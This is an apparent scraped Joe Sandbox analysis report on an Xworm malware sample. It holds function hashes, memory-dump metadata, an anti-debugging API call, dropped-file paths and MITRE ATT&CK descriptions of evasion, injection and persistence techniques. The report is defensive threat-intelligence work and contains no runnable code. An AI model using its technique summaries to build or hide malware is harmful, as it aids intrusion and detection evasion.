Uniqueness

Uniqueness Score: -1.00%

Function 063B662E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593d4b8e1db52adb96ef0bf659639b4d056a2bee6bcdc7e1a8dc142869be498f
Instruction ID: afca7fdaacf42da23b0b0361b526483fc0ebce150638ee7e701193ebd804899a
Opcode Fuzzy Hash: 593d4b8e1db52adb96ef0bf659639b4d056a2bee6bcdc7e1a8dc142869be498f
Instruction Fuzzy Hash: 2D01F238901229CFDB64CF18C889AE9BBF9BB09304F1880E5E50DA3610DB305EC4CF01

Uniqueness

Uniqueness Score: -1.00%

Function 063C50E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction ID: 4209a6b0539cde40dfc6eedd7cb2e46a2935ee0f8dcd947213f88d3e9e8762e9
Opcode Fuzzy Hash: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction Fuzzy Hash: DDE0ED74E05208EFCB84DFA9D54469DFBF4EB88320F10C0AAA81993340D635AE55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 063C91A0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction ID: f424fbf48522c7b51bf75d2db7f6879c4ebaadf90c4ce87872446b5bee752c09
Opcode Fuzzy Hash: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction Fuzzy Hash: 98E0ED74E05208EFCB84DFA8D54569DFBF9EB48310F10C4A9A81893340D6359E55DF80

Uniqueness

Uniqueness Score: -1.00%

Function 063CBDE0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction ID: bfa67c293e63e4891f3eed865e82fb70346ce9295d7dde2d3d9edfb380338336
Opcode Fuzzy Hash: c9b3622521f1efea51a6334fe62df352fd5fc65a7cdbb8cc1f3647007448473a
Instruction Fuzzy Hash: 97E0ED74E05208EFCB84DFA8D545A9DFBF4EB48310F10C0A9E81993340D6759E55DF81

Uniqueness

Uniqueness Score: -1.00%

Function 02250838 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454171fab00418c3beccaf042b1af230aff2cfc33001c99e4b299ad703a3de2f
Instruction ID: 7692f39eef285efb218b2d209d67725eb50ab5526d1adf2b98a7dfad95591430
Opcode Fuzzy Hash: 454171fab00418c3beccaf042b1af230aff2cfc33001c99e4b299ad703a3de2f
Instruction Fuzzy Hash: 46E0DF7498420CAFCB40EBA4FA015DE7BB9EB40300B2040A9D408E7380EA305F048B50

Uniqueness

Uniqueness Score: -1.00%

Function 063CEA70 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac10668878bc7149580b32b7b84c86538badf4ee13a1104e8520d0b6b67ef31
Instruction ID: d2d5a94edec2b74dc8e4a0ad1dd14cb06cc74973502fe69cf41989a6f7f55f7f
Opcode Fuzzy Hash: eac10668878bc7149580b32b7b84c86538badf4ee13a1104e8520d0b6b67ef31
Instruction Fuzzy Hash: 31E04F79909208AFC784DF94D540AADFFB8AB85310F108099E84457341C6319E56DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 063C4FC0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ddf977ae3f3802de1bb9e5d771ab16ed310323540cdf4f4228e2cc5193ff08
Instruction ID: 58ed4a72b88544a4fac3a5cb44da82bf43dcc7c4e2134bc12bb09812aa5e0316
Opcode Fuzzy Hash: 25ddf977ae3f3802de1bb9e5d771ab16ed310323540cdf4f4228e2cc5193ff08
Instruction Fuzzy Hash: 16E01A74D05208EFCB84DFA8D0006ADBBF8AB44301F1080E9E818A3340D6345E55DF81

Uniqueness

Uniqueness Score: -1.00%

Function 063CE5D0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc2d251fab8b1cf5889fd1366384aa698ee6a43693ec5987b4dd5133211f5f0
Instruction ID: a8baeaccd39fbb81570e43cc87bf71bd02837c6c40627ab9eaa06e4fcc66cc8a
Opcode Fuzzy Hash: 3dc2d251fab8b1cf5889fd1366384aa698ee6a43693ec5987b4dd5133211f5f0
Instruction Fuzzy Hash: 99E09274A45208DFC780EFA8D549A98BFF8AB08311F2040A9E80997361EA75DE54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 063C7BD0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b6ee4eb85dfa2202b033bd5dced1494677aa0760d7f220ec06821dc9625907
Instruction ID: fbcb996902a8fee25e48ad4c5ed034bf57bedd17c977ef8d21653e08a5e51c30
Opcode Fuzzy Hash: 95b6ee4eb85dfa2202b033bd5dced1494677aa0760d7f220ec06821dc9625907
Instruction Fuzzy Hash: EDE01A34D09108AFC784DB98D5415ACFBB8EB89310F1080E9AC1853341D6755E46DF80

Uniqueness

Uniqueness Score: -1.00%

Function 063CC970 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a389fc1dcae055a0c8f7012622dc7d47f00a32ff99a931d989b4427a370b915a
Instruction ID: 6d5ed602e2e512da3d08a8c78511208b19e066b0fef37103c3375b0b18fa4390
Opcode Fuzzy Hash: a389fc1dcae055a0c8f7012622dc7d47f00a32ff99a931d989b4427a370b915a
Instruction Fuzzy Hash: B8E0EC35909208DBC744DFA4E5416ADFBB8AB85314F2091DDA80917351CA725E56DBC1

Uniqueness

Uniqueness Score: -1.00%

Function 02250848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d19ceb1a497704912c4d566440e515d5f2ccafbaf624f7be898d4b6293fd2b3
Instruction ID: 03e56fd34ef4fadf9b869e93c3a9ddb608564249fc01d2f0b9bb5bd771c00e77
Opcode Fuzzy Hash: 7d19ceb1a497704912c4d566440e515d5f2ccafbaf624f7be898d4b6293fd2b3
Instruction Fuzzy Hash: A4D01774A4520CEFCB00EFA8FA5155EBBB9EB44300B2085A9D408E7344EB316F009B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0225DDA0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0225DE81
4'^q, xrefs: 0225DE56

Memory Dump Source

Source File: 00000000.00000002.1649860523.0000000002250000.00000040.00000800.00020000.00000000.sdmp, Offset: 02250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2250000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: e2009094c965708cc6180ec8409448e667bf8e20972a66caeb304dd69036b69d
Instruction ID: ed650fa6a9dd306cccabd52582a257492787ce575cfefbafa80ee6c22dafc6ea
Opcode Fuzzy Hash: e2009094c965708cc6180ec8409448e667bf8e20972a66caeb304dd69036b69d
Instruction Fuzzy Hash: 0161F171E502088FDB08DF7AE98169ABFF7BBD8300F14C92AD4089B269DB7159458B90

Uniqueness

Uniqueness Score: -1.00%

Function 063B0040 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e8930e3ff28e169b852ec20fe4ca0b473b4f6e584e5f2cf4ef5f8e4c662bf4
Instruction ID: c1a9bdaaa699a8a2bfd33c04ee6d0298b0f7f513aba10d32ba6ef17d500b615e
Opcode Fuzzy Hash: e7e8930e3ff28e169b852ec20fe4ca0b473b4f6e584e5f2cf4ef5f8e4c662bf4
Instruction Fuzzy Hash: 9E310A75E056198FDB6CCF2BC9446DAFAF6AF88300F14D0FA991CA7615DB304A859F40

Uniqueness

Uniqueness Score: -1.00%

Function 063B0026 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1662648256.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_KjCBSM7Ukv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f14de9a77ec51f6355e413fb6ede93d9a92ce7f99f46140c6274effeb33db6f
Instruction ID: 09e8dc6806ec99a04249386e4f625b810d9b6662406e50606aabbd8315079883
Opcode Fuzzy Hash: 8f14de9a77ec51f6355e413fb6ede93d9a92ce7f99f46140c6274effeb33db6f
Instruction Fuzzy Hash: CE215770D056598FEB6DCF2B885439AFBF6AFC9300F04C0FA9518A6255EB740A85DF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cvtres.exePID: 6752, Parent PID: 6916COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	13%
Total number of Nodes:	23
Total number of Limit Nodes:	3

Executed Functions

Function 0165284C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 0165B3AF

Memory Dump Source

Source File: 00000001.00000002.1781489672.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1650000_cvtres.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 01893a03b0f917204cc98cfda382f1de8496c55c2d1d2084cac613138d910ad4
Instruction ID: 1c0faa731d984589a8b47883d0d9d4544a3522133ae42eaab9868add48052f4d
Opcode Fuzzy Hash: 01893a03b0f917204cc98cfda382f1de8496c55c2d1d2084cac613138d910ad4
Instruction Fuzzy Hash: DD2155B18002198FCB10CF9AC884BEEBBF4AF48320F14842AE845B7251D338A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0165B330 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 0165B3AF

Memory Dump Source

Source File: 00000001.00000002.1781489672.0000000001650000.00000040.00000800.00020000.00000000.sdmp, Offset: 01650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1650000_cvtres.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: a7d377b882127f4f52f3d1b3265d433447c01a45a35f35fb4bae232bdb1ae000
Instruction ID: 1e48b42a9c430a3d77b1100a5e03fe4f5a24b28e9822c7ef4e19f519f88bb8ec
Opcode Fuzzy Hash: a7d377b882127f4f52f3d1b3265d433447c01a45a35f35fb4bae232bdb1ae000
Instruction Fuzzy Hash: 5B2139B1800259CFCB14CF9AC485BEEBBF5EF49320F14846AD855A7351D7389944CF64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KjCBSM7Ukv.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_cvtres.exe_9cebbb35099493e8eef666c73a0984e3abb1_c414e931_7578e924-5677-4055-9699-9b04449069e8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER40FF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER42E5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4315.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KjCBSM7Ukv.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
KjCBSM7Ukv.exe

Function 0165284C Relevance: 1.6, APIs: 1, Instructions: 68
COMMON